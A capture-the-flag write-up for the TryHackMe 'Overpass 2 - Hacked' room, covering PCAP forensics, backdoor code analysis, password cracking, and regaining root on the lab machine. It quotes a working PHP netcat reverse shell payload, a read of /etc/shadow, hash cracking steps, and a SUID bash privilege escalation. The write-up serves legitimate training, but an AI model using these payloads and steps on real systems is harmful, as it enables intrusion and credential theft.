Overpass 2 - Hacked is a great blue team room on TryHackMe, and in this write-up we’re going to dig into clearing it and answering all the questions the room throws at us.
Forensics - Analyse the PCAP
While we’re waiting for our Kali VM to boot up we can download the Wireshark PCAP file and check that the MD5 hash matches the supplied hash of 11c3b2e9221865580295bc662c35c6dc, which it does. After that we’ll just open the file on Wireshark and get to work.
What was the URL of the page they used to upload a reverse shell?
By filtering by http.request.method == "POST" we’re able to list only the parts of the file that cover any POST requests, and since there is only one hit that’s the one we’re going to go with, so the answer is /development/.
What payload did the attacker use to gain access?
While still looking at the POST request we can knock the next one down as well, so diving down into the Media type we can immediate catch a PHP code snippet on the right hand side of our screen.
To make it easier to read we’ll just copy it out, and see that the answer to the question will be <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>, which is a reverse shell the attacker can get access to the vulnerable system by using a tool like Netcat. Note that the attacker chose to use the port 4242 - we will use this information in the next step.
What password did the attacker use to privesc?
Given that Netcat is unencrypted we’re able to look up the traffic in the PCAP file, so by filtering by the port the attacker used (tcp.port == 4242) and following the TCP stream we can get a view that makes understanding the event very easy. In the following picture all the blue highlighted parts are the commands or inputs the attacker sent to the system, and red are the server responses. There’s a lot of good and useful information in this stream, so you may want to copy it to your notes.
As for the actual question we’re asked, the answer can be found by simply looking at what the attacker wrote as the password after using the su james command to switch to the user account of james.
How did the attacker establish persistence?
Moving further in the stream we’ll find the answer to the next question by looking at what the attacker cloned from GitHub. We’ll be looking into the code a bit later, but the name of the repository kinda gives away what it is and what it does.
The answer to the question is the GitHub URL.
Using the fasttrack wordlist, how many of the system passwords were crackable?
Once again the TCP stream helps us to find the answers to this question, since the attacker ran the sudo cat /etc/shadow command to get a printout of the shadow file, which contains some password hashes.
Using https://hashcat.net/wiki/doku.php?id=example_hashes and by looking for $6$ (the beginning of the hash which works like identifier) we’re able to look up the hash type, which we need to know in order to be able to run Hashcat correctly. The table shows that the hashes are sha512crypt, and we’re told to use Hash-mode 1800. We’ll combine this with the fasttrack.txt wordlist as instructed and crack the passwords one by one.
Finally we’ll see that we’re able to crack four hashes from the shadow file, and this brings us to the end of the first part of the room.
Research - Analyse the code
Next we’ll be moving on to do some simple analysis of the code found in the GitHub link, so proceed to the repository and open the main.go file to find the answers to the simple questions that will follow.
What’s the default hash for the backdoor?
You’ll probably notice this right off the bat, as the var hash string = really pops out the the beginning of the program code. The answer is the actual hash.
What’s the hardcoded salt for the backdoor?
Salting in cryptography is an additional one-way function to hash whatever data we want to safeguard. Salts are (hopefully) randomly generated each time one is needed in order to make sure that even if the original data (say, a password) is the same as another piece of data (in this example another user’s password, which is the same as the one before), the random salt will make the resulting hashes of these two identical passwords be different. Basically salting is additional level of protection.
Getting back to our program code we can look through it and notice that at the very end we have a row return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password). The hardcoded salt is the one in the middle.
What was the hash that the attacker used?
To find the answer to this question we need to return to Wireshark (hopefully you didn’t close it yet) and once again look through the TCP stream to easily find how the attacker acted. Quickly scanning for the part where they chmodded the downloaded script and ran it with the flag -a (for custom hash, see the code on GitHub) we’re able to figure out the customized hash the attacker used.
Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
In case you’re unaware, rockyou(.txt) is a list of over 32 million plaintext passwords originating from a data breach of a company of the same name. This file is freely available online, and comes with all Kali Linux installations, so we’re ready to get cracking again.
We’ll be once again using Hashcat, but feel free to use whatever you feel the most comfortable with. First we’ll check the hash that we have with a tool such as https://hashes.com/en/tools/hash_identifier to see that the possible hashing algorithm is SHA512, and then we’ll compare these findings to the Hashcat example hashes to find the correct Hash-Mode and usage.
We’ll see that the correct mode to be used is 1710, and the Hash-Name is sha512($pass.$salt), meaning that we’ll need to pass both the hash itself and the salt we found, separated by a colon. Thea reason I’m pointing this out is not because I managed to brush over it myself and spent a bit too long time troubleshooting something that was clearly pointed out to me, but just in case YOU would make such a mistake.
After a quick run of Hashcat we get our password, and it’s good to keep your notes in order so that you’ll remember that this is the password for the backdoor - not general SSH account password or anything else. And this concludes the second stage of the room - next we’ll be connecting to the host, looking around a bit and collecting our flags.
Attack - Get back in!
Start the machine and go grab a glass of water while you’re waiting to proceed.
The attacker defaced the website. What message did they leave as a heading?
This is a rather self-explanatory, given that you’ll just need to open up a browser and navigate to the IP address of the machine to see what little there is to be seen.
Using the information you’ve found previously, hack your way back in!
We have collected a lot of information, and hope you have kept your notes clean (or at least as clean as possible) to be able to get into the machine.
Since we know we have an active backdoor we can just use that to get in ourselves, we just need to remember to use the port 2222 as configured in the backdoor code. We’ll bee using the user account james to log in.
Another thing to note is that if you get the error “no matching host key type found. Their offer: ssh-rsa” when trying to SSH in, just add "-oHostKeyAlgorithms=+ssh-rsa" to your SSH command and you’re off to the races.
What’s the user flag?
As usual the user flag can be found in /home/james/user.txt so we can just cat that out right off the bat, but in order to get the root flag we need to find a way to privesc ourselves to root.
What’s the root flag?
First of all we’ll want to check if we have any SUID set binaries available we could exploit, by running the command find / -perm -u=s -type f 2>/dev/null, and one entry does pop out as interesting: /home/james/.suid_bash.
When we check out the file in our home directory a bit closer with ll we can see that it could well be our way in. Since we know it has the SUID set, we can check out bash in GTFOBins (https://gtfobins.github.io/gtfobins/bash/) to see if there’s some useful information for us there, and it appears that if we were to run the binary with ./.suid_bash -p it should give us a root shell.
And lo and behold, it does. From this point we can just cat the root flag from /root/root.txt and we have successfully completed the Overpass 2 - Hacked room on TryHackMe.